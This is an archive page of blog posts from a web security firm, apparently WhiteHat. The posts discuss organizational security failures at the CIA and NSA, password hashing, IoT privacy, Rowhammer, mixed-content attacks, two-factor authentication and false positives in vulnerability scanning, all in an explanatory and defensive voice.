Category Archives: Technical Insight

When departments work at cross-purposes

Back in August, we wrote about how self-discipline can be one of the hardest parts of security, as illustrated by Snowden and the NSA. Just recently, Salon published an article about similar issues that plagued the CIA during the Cold War: How to explain the KGB’s amazing success identifying CIA agents in the field?

So many of their agents were being uncovered by the Soviets that they assumed there must’ve been double agents…somewhere. Apparently there was a lot of inward-focused paranoia. The truth was a lot more mundane, but also very actionable — not only for the CIA, but for business in general: two departments (in this case, two agencies) in one organization with incompatible, non-coordinated policies:

So how, exactly, did Totrov reconstitute CIA personnel listings without access to the files themselves or those who put them together?

His approach required a clever combination of clear insight into human behavior, root common sense and strict logic.

In the world of secret intelligence the first rule is that of the ancient Chinese philosopher of war Sun Tzu: To defeat the enemy, you have above all to know yourself. The KGB was a huge bureaucracy within a bureaucracy — the Soviet Union. Any Soviet citizen had an intimate acquaintance with how bureaucracies function. They are fundamentally creatures of habit and, as any cryptanalyst knows, the key to breaking the adversary’s cipher is to find repetitions. The same applies to the parallel universe of human counterintelligence.

The difference between Totrov and his fellow citizens was that whereas others at home and abroad would assume the Soviet Union was somehow unique, he applied his understanding of his own society to a society that on the surface seemed unique, but which, in respect of how government worked, was not in fact that much different: the United States.

From an organizational point of view, what’s fascinating is that the problem came from two different agencies with different missions having incompatible, uncoordinated policies: policies for Foreign Service Officers and policies for CIA officers were different enough to allow the Soviet Union to identify individuals who were theoretically Foreign Service Officers but who did not receive the same treatment as actual Foreign Service Officers. Pay and policy differentials made it easy to separate actual Foreign Service Officers from CIA agents.

Thus one productive line of inquiry quickly yielded evidence: the differences in the way agency officers undercover as diplomats were treated from genuine foreign service officers (FSOs). The pay scale at entry was much higher for a CIA officer; after three to four years abroad a genuine FSO could return home, whereas an agency employee could not; real FSOs had to be recruited between the ages of 21 and 31, whereas this did not apply to an agency officer; only real FSOs had to attend the Institute of Foreign Service for three months before entering the service; naturalized Americans could not become FSOs for at least nine years but they could become agency employees; when agency officers returned home, they did not normally appear in State Department listings; should they appear they were classified as research and planning, research and intelligence, consular or chancery for security affairs; unlike FSOs, agency officers could change their place of work for no apparent reason; their published biographies contained obvious gaps; agency officers could be relocated within the country to which they were posted, FSOs were not; agency officers usually had more than one working foreign language; their cover was usually as a “political” or “consular” official (often vice-consul); internal embassy reorganizations usually left agency personnel untouched, whether their rank, their office space or their telephones; their offices were located in restricted zones within the embassy; they would appear on the streets during the working day using public telephone boxes; they would arrange meetings for the evening, out of town, usually around 7.30 p.m. or 8.00 p.m.; and whereas FSOs had to observe strict rules about attending dinner, agency officers could come and go as they pleased.

You don’t need to infiltrate the CIA if the CIA and the State Department can’t agree on how to treat their staff and what rules to apply!

One way of looking at the problem was that the diplomats had their own goals, and they set policies appropriate to those goals. By necessity, they didn’t actually know the overall goals of their own embassies. It’s not unusual for different subdivisions of an organization to have conflicting goals. The question is how to manage those tensions. What was the point of requiring a 9 year wait after naturalization before someone could work as a foreign service officer? A different executive agency, with higher needs for the integrity of its agents, didn’t consider the wait necessary. Eliminating the wait would’ve eliminated an obvious difference between agents and normal diplomats.

But are we sure the wait wasn’t necessary? It creates a large obstacle for our adversaries: they need to think 9 years ahead if they want to supply their own mole instead of turning one of our diplomats. On the other hand, it created too large an obstacle for ourselves.

Is it more important to defend against foreign agents or to create high-quality cover for our own agents? Two agencies disagreed and pursued their own interests without resolving the disagreement. Either policy could have been effective; having both policies was an information give-away.

How can this sort of issue arise for private businesses? Too often individual departments can set policies that come into conflict with one another. For instance, an IT department may with perfectly reasonable justification decide to standardize on a single browser. A second department decides to develop internal tools that rely on browser add-ons like ActiveX or Java applets. When a vulnerability is discovered in those add-ons to the standard browser, the organization finds it is now dependent on an inherently insecure tool. Neither department is responsible for the situation; both acted in good faith within their arena. The problem was caused by a lack of any one responsible for determining how to set policies for the best good of the organization as a whole.

Security policies need to be set to take all the organization’s goals into consideration; to do that, someone has to be looking at the whole picture.

Complexity and Storage Slow Attackers Down

Back in 2013, WhiteHat founder Jeremiah Grossman forgot an important password, and Jeremi Gosney of Stricture Consulting Group helped him crack it. Gosney knows password cracking, and he’s up for a challenge, but he knew it’d be futile trying to crack the leaked Ashley Madison passwords. Dean Pierce gave it a shot, and Ars Technica provides some context.

Ashley Madison made mistakes, but password storage wasn’t one of them. This is what came of Pierce’s efforts:

After five days, he was able to crack only 4,007 of the weakest passwords, which comes to just 0.0668 percent of the six million passwords in his pool.

It’s like Jeremiah said after his difficult experience:

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity. I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Imagine the average person that doesn’t even work in IT! Logging in to a website feels simpler than it is. It feels like, “The website checked my password, and now I’m logged in.”

Actually, “being logged in” means that the server gave your browser a secret number, AND your browser includes that number every time it makes a request, AND the server has a table of which number goes with which person, AND the server sends you the right stuff based on who you are. Usernames and passwords have to do with whether the server gives your browser the secret number in the first place.

It’s natural to assume that “checking your password” means that the server knows your password, and it compares it to what you typed in the login form. By now, everyone has heard that they’re supposed to have an impossible-to-remember password, but the reasons aren’t usually explained – people have their own problems besides the finer points of PBKDF2 vs. bcrypt).

If you’ve never had to think about it, it’s also natural to assume that hackers guessing your password are literally trying to log in as you. Even professional programmers can make that assumption, when password storage is outside their area of expertise. Our clients’ developers sometimes object to findings about password complexity or other brute force issues because they throttle login attempts, lock accounts after 3 incorrect guesses, etc. If that were true, hackers would be greatly limited by how long it takes to make each request over the network. Account lockouts are probably enough to discourage a person’s acquaintances, but they aren’t a protection against offline password cracking.

Password complexity requirements (include mixed case, include numbers, include symbols) are there to protect you once an organization has already been compromised (like Ashley Madison). In that scenario, password complexity is what you can do to help yourself. Proper password storage is what the organization can do. The key to that is in what exactly “checking your password” means.

When the server receives your login attempt, it runs your password through something called a hash function. When you set your password, the server ran your password through the hash function and stored the result, not your password. The server should only keep the password long enough to run it through the hash function. The difference between secure and insecure password storage is in the choice of hash function.

If your enemy is using brute force against you and trying every single thing, your best bet is to slow them down. That’s the thinking behind account lockouts and the design of functions like bcrypt. Running data through a hash function might be fast or slow, depending on the hash function. They have many applications. You can use them to confirm that large files haven’t been corrupted, and for that purpose it’s good for them to be fast. SHA256 would be a hash function suitable for that.

A common mistake is using a deliberately fast hash function, when a deliberately slow one is appropriate. Password storage is an unusual situation where we want the computation to be as slow and inefficient as practicable.

In the case of hackers who’ve compromised an account database, they have a table of usernames and strings like “$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy”. Cracking the password means that they make a guess, run it through the hash function, and get the same string. If you use a complicated password, they have to try more passwords. That’s what you can do to slow them down. What organizations can do is to choose a hash function that makes each individual check very time-consuming. It’s cryptography, so big numbers are involved. The “only” thing protecting the passwords of Ashley Madison users is that trying a fraction of the possible passwords is too time-consuming to be practical.

Consumers have all the necessary information to read about password storage best practices and pressure companies to use those practices. At least one website is devoted to the cause. It’s interesting that computers are forcing ordinary people to think about these things, and not just spies.

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • Github
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duosec 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • Apparmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API to for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but they can’t know all of these things all at once, especially given how quickly technologies change. Since there is no one who can understand all of those things at once, we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the numbers of full-stack security experts. People may know quite a bit about a lot of these technologies, but when it comes down to it, there’s a very real chance that any single security person will become more and more specialized over time — it’s simply hard to avoid specialization, given the growing complexity of modern apps. We may eventually see the death of the full-stack security person as well as a result.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means that there will be more and more silos where people will handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failure to use a diverse and potentially external expertise in security/operations will ensure sec-ops failure.

At its heart, this is a result of economic forces – more code needs to be delivered and there are fewer people who understand what it’s actually doing. So outsource what you can’t know since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other services providers and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Developers and Security Tools

A recent study from NC State states that, “the two things that were most strongly associated with using security tools were peer influence and corporate culture. As a former developer, and as someone who has reviewed the source code of countless web applications, I can say these tools are almost impossible to use for the average developer. Security tools are invariably written for security experts and consultants. Tools produce a huge percentage of false alarms – if you are lucky, you will comb through 100 false alarms to find one legitimate issue.

The false assumption here is that running a tool will result in better security. Peer pressure to do security doesn’t quite make sense because most developers are not trained in security. And since the average tool produces a large number of false alarms, and since the pressure to ship new features as quickly as possible is so high, there will never be enough time, training or background for the average developer to effectively evaluate their own security.

The “evangelist” model the study mentions does seem to work well among some of the WhiteHat Security clients. Anecdotally, I know many organizations that will accept one volunteer per security group as a security “marshall” (something similar akin to a floor “fire marshall”). That volunteer receives special security training, but ultimately acts as a bridge between his or her individual development team and the security team.

Placing the burden of security entirely on the developers is unfair, as is making them choose between fixing vulnerabilities and shipping new code. One of the dirty secrets of technology is this: even though developers often are shouldered with the responsibility of security, risk and security are really business decisions. Security is also a process that goes far beyond the development process. Developers cannot be solely responsible for application security. Business analysts, architects, developers, quality assurance, security teams, and operations all play a critical role in managing technology risk. And above all, managers (including the C-level team) must provide direction, set levels or tolerable risk, and it is ultimately responsible for making the decision to ship new code or fix vulnerabilities. That is ultimately a business decision.

It Can Happen to Anyone

Earlier this summer, The Intercept published some details about the NSA’s XKEYSCORE program. Those details included some security issues around logging and authorization:

As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to ensure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

These are exactly the same kinds of problems that led to the Snowden leaks:

As a system administrator, Snowden was allowed to look at any file he wanted, and his actions were largely unaudited. “At certain levels, you are the audit,” said an intelligence official.

He was also able to access NSAnet, the agency’s intranet, without leaving any signature, said a person briefed on the postmortem of Snowden’s theft. He was essentially a “ghost user,” said the source, making it difficult to trace when he signed on or what files he accessed.

If he wanted, he would even have been able to pose as any other user with access to NSAnet, said the source.

The NSA obviously had the in-house expertise to design the system differently. Surely they know the importance of logging from their own experience hacking things and responding to breaches. How could this happen?

The most cynical explanation is that the point is not to log everything. Plausible deniability is a goal of intelligence agencies. Nobody can subpoena records that don’t exist. The simple fact of tracking an individual can be highly sensitive (e.g., foreign heads of state).

There’s also a simpler explanation: basic organizational problems. From the same NBC News article:

It’s 2013 and the NSA is stuck in 2003 technology,” said an intelligence official.

Jason Healey, a former cyber-security official in the Bush Administration, said the Defense Department and the NSA have “frittered away years” trying to catch up to the security technology and practices used in private industry. “The DoD and especially NSA are known for awesome cyber security, but this seems somewhat misplaced,” said Healey, now a cyber expert at the Atlantic Council. “They are great at some sophisticated tasks but oddly bad at many of the simplest.

In other words, lack of upgrades, “not invented here syndrome,” outsourcing with inadequate follow-up and accountability, and other familiar issues affect even the NSA. Very smart groups of people have these issues, even when they understand them intellectually.

Each individual department of the NSA probably faces challenges very similar to those of a lot of software companies: things need to be done yesterday, and done cheaper. New features are prioritized above technical debt. “It’s just an internal system, and we can trust our own people, anyway…”

Security has costs. Those costs include money, time, and convenience — making a system secure creates obstacles, so there’s always a temptation to ignore security “just this once,” “just for this purpose,” “just for now.” Security is a game in which the adversary tests your intelligence and creativity, yes; but most of all, the adversary tests your thoroughness and your discipline.

Conspiracy Theory and the Internet of Things

I came across this article about smart devices on Alternet, which tells us that “we are far from a digital Orwellian nightmare.” We’re told that worrying about smart televisions, smart phones, and smart meters is for “conspiracy theorists.”

It’s a great case study in not having a security mindset.

This is what David Petraeus said about the Internet of Things at the In-Q-Tel CEO summit in 2012, while he was head of the CIA:

Items of interest will be located, identified, monitored, and remotely controlled through technologies such as radio-frequency identification, sensor networks, tiny embedded servers, and energy harvesters—all connected to the next-generation Internet using abundant, low cost, and high-power computing—the latter now going to cloud computing, in many areas greater and greater supercomputing, and, ultimately, heading to quantum computing.

In practice, these technologies could lead to rapid integration of data from closed societies and provide near-continuous, persistent monitoring of virtually anywhere we choose. “Transformational” is an overused word, but I do believe it properly applies to these technologies, particularly to their effect on clandestine tradecraft. Taken together, these developments change our notions of secrecy and create innumerable challenges—as well as opportunities.

In-Q-Tel is a venture capital firm that invests “with the sole purpose of delivering these cutting-edge technologies to IC [intelligence community] end users quickly and efficiently.” Quickly means 3 years, for their purposes.

It’s been more than 3 years since Petraeus made those remarks. “Is the CIA meeting its stated goals?” is a fair question. Evil space lizards are an absurd conspiracy theory, for comparison.

Smart Televisions

The concerns are confidently dismissed:

Digital Trends points out that smart televisions aren’t “always listening” as they are being portrayed in the media. In fact, such televisions are asleep most of the time, and are only awaken [sic] when they hear a pre-programmed phrase like “Hi, TV.” So, any conversation you may be having before waking the television is not captured or reported. In fact, when the television is listening, it informs the user it is in this mode by beeping and displaying a microphone icon. And when the television enters into listening mode, it doesn’t comprehend anything except a catalog of pre-programmed, executable commands.

Mistaken assumption: gadgets work as intended.

Here’s a Washington Post story from 2013:

The FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years, and has used that technique mainly in terrorism cases or the most serious criminal investigations, said Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, now on the advisory board of Subsentio, a firm that helps telecommunications carriers comply with federal wiretap statutes.

Logically speaking, how does the smart TV know it’s heard a pre-programmed phrase? The microphone must be on so that ambient sounds and the pre-programmed phrases can be compared. We already know the device can transmit data over the internet. The issue is whether or not data can be transmitted at the wrong time, to the wrong people. What if there was a simple bug that kept the microphone from shutting off, once it’s turned on? That would be analogous to insufficient session expiration in a web app, which is pretty common.

The author admits that voice data is being sent to servers advanced enough to detect regional dialects. A low-profile third party contractor has the ability to know whether someone with a different accent is in your living room:

With smart televisions, some information, like IP address and other stored data may be transmitted as well. According to Samsung, its speech recognition technology can also be used to better recognize regional dialects and accents and other things to enhance the user experience. To do all these things, smart television makers like Samsung must employ third-party applications and servers to help them decipher the information it takes in, but this information is encrypted during transmission and not retained or for sale, at least according to the company’s privacy policy.

Can we trust that the encryption is done correctly, and nobody’s stolen the keys? Can we trust that the third parties doing natural language processing haven’t been compromised?

Smart Phones

The Alternet piece has an anecdote of someone telling the author to “Never plug your phone in at a public place; they’ll steal all your information.” Someone can be technically unsophisticated but have the right intuitions. The man doesn’t understand that his phone broadcasts radio waves into the environment, so he has an inaccurate mental model of the threat. He knows that there is a threat.

Then this passage:

A few months back, a series of videos were posted to YouTube and Facebook claiming that the stickers affixed to cellphone batteries are transmitters used for data collection and spying. The initial video showed a man peeling a Near Field Communication transmitter off the wrapper on his Samsung Galaxy S4 battery. The person speaking on the video claims this “chip” allows personal information, such as photographs, text messages, videos and emails to be shared with nearby devices and “the company.” He recommended that the sticker be removed from the phone’s battery….

And that sticker isn’t some nefarious implant the phone manufacturer uses to spy on you; it’s nothing more than a coil antenna to facilitate NFC transmission. If you peel this sticker from your battery, it will compromise your smartphone and likely render it useless for apps that use NFC, like Apple Pay and Google Wallet.

As Ars Technica put it in 2012:

By exploiting multiple security weakness in the industry standard known as Near Field Communication, smartphone hacker Charlie Miller can take control of handsets made by Samsung and Nokia. The attack works by putting the phone a few centimeters away from a quarter-sized chip, or touching it to another NFC-enabled phone. Code on the attacker-controlled chip or handset is beamed to the target phone over the air, then opens malicious files or webpages that exploit known vulnerabilities in a document reader or browser, or in some cases in the operating system itself.

Here, the author didn’t imagine a scenario where a someone might get a malicious device within a few centimeters of his phone. “Can I borrow your phone?” “Place all items from your pockets in the tray before stepping through the security checkpoint.” “Scan this barcode for free stuff!”

Smart Meters

Finally, the Alternet piece has this to say about smart meters:

In recent years, privacy activists have targeted smart meters, saying they collect detailed data about energy consumption. These conspiracy theorists are known to flood public utility commission meetings, claiming that smart meters can do a lot of sneaky things like transmit the television shows they watch, the appliances they use, the music they listen to, the websites they visit and their electronic banking use. They believe smart meters are the ultimate spying tool, making the electrical grid and the utilities that run it the ultimate spies.

Again, people can have the right intuitions about things without being technical specialists. That doesn’t mean their concerns are absurd:

The SmartMeters feature digital displays, rather than the spinning-usage wheels seen on older electromagnetic models. They track how much energy is used and when, and transmit that data directly to PG&E. This eliminates the need for paid meter readers, since the utility can immediately access customers’ usage records remotely and, theoretically, find out whether they are consuming, say, exactly 2,000 watts for exactly 12 hours a day.

That’s a problem, because usage patterns like that are telltale signs of indoor marijuana grow operations, which will often run air or water filtration systems round the clock, but leave grow lights turned on for half the day to simulate the sun, according to the Silicon Valley Americans for Safe Access, a cannabis users’ advocacy group.

What’s to stop PG&E from sharing this sensitive information with law enforcement? SmartMeters “pose a direct privacy threat to patients who … grow their own medicine,” says Lauren Vasquez, Silicon Valley ASA’s interim director. “The power company may report suspected pot growers to police, or the police may demand that PG&E turn over customer records.”

Even if you’re not doing anything ambiguously legal, the first thing that you do when you get home is probably turning the lights on. Different appliances use different amounts of power. By reporting power consumption at higher intervals, smart meters can give away a lot about what’s going on in a house.


That’s not the same as what you were watching on TV, but the content of phone conversations isn’t all that’s interesting about them, either.

It’s hard to trust things.

Hammering at speed limits

Slate has a well-written article explaining an interesting new vulnerability called “Rowhammer.” The white paper is here, and the code repository is here. Here’s the abstract describing the basic idea:

As DRAM has been scaling to increase in density, the cells are less isolated from each other. Recent studies have found that repeated accesses to DRAM rows can cause random bit flips in an adjacent row, resulting in the so called Rowhammer bug. This bug has already been exploited to gain root privileges and to evade a sandbox, showing the severity of faulting single bits for security. However, these exploits are written in native code and use special instructions to flush data from the cache.

In this paper we present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

What’s interesting to me is how much computers had to advance to make this situation possible. First, RAM had to be miniaturized enough that adjacent memory cells can interfere with one another. The RAM’s refresh rate had to be optimally low, because refreshing memory use up time and power.

Lots more had to happen before this was remotely exploitable via JavaScript. JavaScript wasn’t designed to quickly process binary data, or really even deal with binary data. It’s a high-level language without pointers or direct memory access. Semantically, JavaScript arrays aren’t contiguous blocks of memory like C arrays. They’re special objects whose keys happen to be integers. The third and fourth entries of an array aren’t necessarily next to each other in memory, and each item in an array might have a different type.

Typed Arrays were introduced for performance reasons, to facilitate working with binary data. They were especially necessary for allowing fast 3D graphics with WebGL. Typed Arrays do occupy adjacent memory cells, unlike normal arrays.

In other words, computers had to get faster, websites had to get fancier, and performance expectations had to go up.

Preventing the attack would kill performance at a hardware level: the RAM would have to spend up to 35% of its time refreshing itself. Short of hardware changes, the authors suggest that browser vendors implement tests for the vulnerability, then throttle JavaScript performance if the system is found to be vulnerable. JavaScript should have to be actively enabled by the user when they visit a website.

It seems unlikely that browser vendors are going to voluntarily undo all the work they’ve done, but they could. It would be difficult to explain to the “average person” that their computer needs to slow down because of some “Rowhammer” business. Rowhammer exists because both hardware and software vendors listened to consumer demands for higher performance. We could slow down, but it’s psychologically intolerable. The known technical solution is emotionally unacceptable to real people, so more advanced technical solutions will be attempted.

In a very similar way, we could make a huge dent in pollution and greenhouse gas emissions if we slowed down our cars and ships by half. For the vast majority of human history, we got by and nobody could travel close to 40 mph, let alone 80 mph.

When you really have information that people want, the safest thing is probably just to use typewriters. Russia already does, and Germany has considered it.

The solutions to security problems have to be technically correct and psychologically acceptable, and it’s the second part that’s hard.

Why is Passive Mixed Content so serious?

One of the most important tools in web security is Transport Layer Security (TLS). It not only protects sensitive information during transit, but also verifies that the content has not been modified. The user can be confident that content delivered via HTTPS is exactly what the website sent. The user can exchange sensitive information with the website, secure in the knowledge that it won’t be altered or intercepted. However, this increase in security comes with an increased overhead cost. It is tempting to be concerned only about encryption and ignore the necessity to validate on both ends, but any resources that are called on a secure page should be similarly protected, not just the ones containing secret content.

Most web security professionals agree that active content — JavaScript, Flash, etc. — should only be sourced in via HTTPS. After all, an attacker can use a Man-in-the-Middle attack to replace non-secure content on the fly. This is clearly a security risk. Active content has access to the content of the Document Object Model (DOM), and the means to exfiltrate that data. Any attack that is possible with Cross-Site Scripting is also achievable using active mixed content.

The controversy begins when the discussion turns to passive content — images, videos, etc. It may be difficult to imagine how an attacker could inflict anything worse than mild annoyance by replacing such content. There are two attack scenarios which are commonly cited.

An unsophisticated attacker could, perhaps, damage the reputation of a company by including offensive or illegal content. However, the attack would only be effective while the attacker maintains a privileged position on the network. If the user moves to a different Wi-Fi network, the attacker is out of the loop. It would be easy to demonstrate to the press or law enforcement that the company is not responsible, so the impact would be negligible.
If a particular browser’s image parsing process is vulnerable, a highly sophisticated attacker can deliver a specially crafted, malformed file using a passive mixed content vulnerability. In this case, the delivery method is incidental, and the vulnerability lies with the client, rather than the server. This attack requires advanced intelligence about the specific target’s browser, and an un-patched or unreported vulnerability in that specific browser, so the threat is negligible.
However, there is an attack scenario that requires little technical sophistication, yet may result in a complete account takeover. First, assume the attacker has established a privileged position in the network by spoofing a public Wi-Fi access point. The attacker can now return any response to non-encrypted requests coming over the air. From this position, the attacker can return a 302 “Found” temporary redirect to a non-encrypted request for the passive content on the target site. The location header for this request is a resource under their control, configured to respond with a 401 “Unauthorized” response containing a WWW-Authenticate header with a value of Basic realm=”Please confirm your credentials.” The user’s browser will halt loading the page and display an authentication prompt. Some percentage of users will inevitably enter their credentials, which will be submitted directly to the attacker. Even worse, this attack can be automated and generalized to such a degree that an attacker could use commodity hardware to set up a fake Wi-Fi hotspot in a public place and harvest passwords from any number of sites.

Protecting against this attack is relatively simple. For users, be very suspicious of any unexpected login prompts, especially if it doesn’t look like part of the website. For developers, source in all resources using HTTPS on every secure page.

Web Security for the Tech Impaired: What is two factor authentication?

You may have heard the term ‘two-factor’ or ‘multi-factor’ authentication. If you haven’t heard of these terms, chances are you’ve experienced this and not even known it. The interesting thing is that two factor authentication is one of the best ways to protect your accounts from being hacked.

So what exactly is it? Well traditional authentication will ask you for your username and password. This is an example of a system that relies on one factor — something you KNOW — as the sole authentication method to your account. If another person knows your username and password they can also login to your account. This is how many account compromises happen, a hacker simply runs through possible passwords of accounts they want to hack and will eventually guess the correct password through what is known as a ‘brute force’ attack.

In two-factor authentication, we take the concept of security a step further. Instead of only relying on something that you KNOW we also rely on something that you HAVE in your possession. You may have already been doing this and not even realized it — have you logged into your bank or credit card only to see a message like ‘This is the first time you have logged in from this machine; we have sent an authentication code to the cell phone number on file for your account — please enter that number and your password” or words to that effect? That is an example of a site that is using two-factor authentication. By using the cell phone number they have on file to send you a text to confirm that you are who you say you are, they are relying on not only something you KNOW but also something you HAVE. If an attacker were to steal or guess your username and password, they would not be able to successfully login to your account because you would receive a text out of the blue for an account you didn’t login to. At that moment you would know someone is probably trying to login to your account.

This system works with anything you have. Text is the primary means of two factor authentication as most people have easy access to a cell phone and it’s easy to read the code to enter onto the site. This system works just as well with a phone call that provides you with a code or with an email. Anything that you HAVE will work with two factor authentication. You may notice that most sites will only ask you for this information once; typically sites will ask you the very first time you log in from a given device (be it mobile, desktop or tablet). After that, the site will remember what devices you’ve signed on with and allow those devices to login without requiring the second factor, the auth code. If you typically log in with your home computer, and then remember you need to check your balance at work, the site will ask you to log in with two-factor authentication because it does not recognize that device. The thought is that a hacker is unlikely to hack into your account by breaking into your house and using your own computer to login.

Now you may be saying ‘that sounds great! Where do I sign up?’. Unfortunately not all systems support two factor authentication. However, the industry is slowly progressing that way. Sometimes it isn’t enabled by default but is an options in a ‘settings’ or ‘account’ menu on the site. To see a list of common sites and status on supporting two-factor auth, is a great resource. I highly recommend turning this service on for any account that supports it. Typically, it’s extremely quick and easy to do and will make your accounts far more secure then ever before.

Bayes’ Theorem and What We Do

Back in 2012, The Atlantic Monthly published a behind-the-scenes article about Google Maps. This is the passage that struck me:

The best way to figure out if you can make a left turn at a particular intersection is still to have a person look at a sign — whether that’s a human driving or a human looking at an image generated by a Street View car.

There is an analogy to be made to one of Google’s other impressive projects: Google Translate. What looks like machine intelligence is actually only a recombination of human intelligence. Translate relies on massive bodies of text that have been translated into different languages by humans; it then is able to extract words and phrases that match up. The algorithms are not actually that complex, but they work because of the massive amounts of data (i.e. human intelligence) that go into the task on the front end.

Google Maps has executed a similar operation. Humans are coding every bit of the logic of the road onto a representation of the world so that computers can simply duplicate (infinitely, instantly) the judgments that a person already made…

…I came away convinced that the geographic data Google has assembled is not likely to be matched by any other company. The secret to this success isn’t, as you might expect, Google’s facility with data, but rather its willingness to commit humans to combining and cleaning data about the physical world. Google’s map offerings build in the human intelligence on the front end, and that’s what allows its computers to tell you the best route from San Francisco to Boston.

Even for Google, massive and sophisticated automation is only a first step. Human judgment is also an unavoidable part of documenting web application vulnerabilities. The reason isn’t necessarily obvious: Bayes’ theorem.

Bayes' Theorem Img 1

“P(A|B)” means “the probability of A, given B.”

Wikipedia explains the concept in terms of drug testing:

Suppose a drug test is 99% sensitive and 99% specific. That is, the test will produce 99% true positive results for drug users and 99% true negative results for non-drug users. Suppose that 0.5% of people are users of the drug. If a randomly selected individual tests positive, what is the probability he or she is a user?

Bayes' Theorem Img 2

The reason the correct answer of 33% is counter-intuitive is called base rate neglect. If you have a very accurate test for something that happens infrequently, that test will usually report false positives. That’s worth repeating: if you’re looking for a needle in a haystack, the best possible tests will usually report false positives.

Filtering out false positives is an important part of our service, over and above the scanning technology itself. Because most URLs aren’t vulnerable to most things, we see a lot of false positives. They’re the price of automated scanning.

We also see a lot of duplicates. A website might have a search box on every page that’s vulnerable to cross-site scripting, but it’s not helpful to get a security report that’s more or less a list of the pages on your website. It is helpful to be told there’s a problem with the search box. Once.

Machine learning is getting better every day, but we don’t have time to wait for computers to read and understand websites as well as humans. Here and now, we need to find vulnerabilities, and scanners can cover a site more efficiently than a human. Unfortunately, false positives are an unavoidable part of that.

Someone has to sort them out. When everything is working right, that part of our service is invisible, just like the people hand-correcting Google Maps.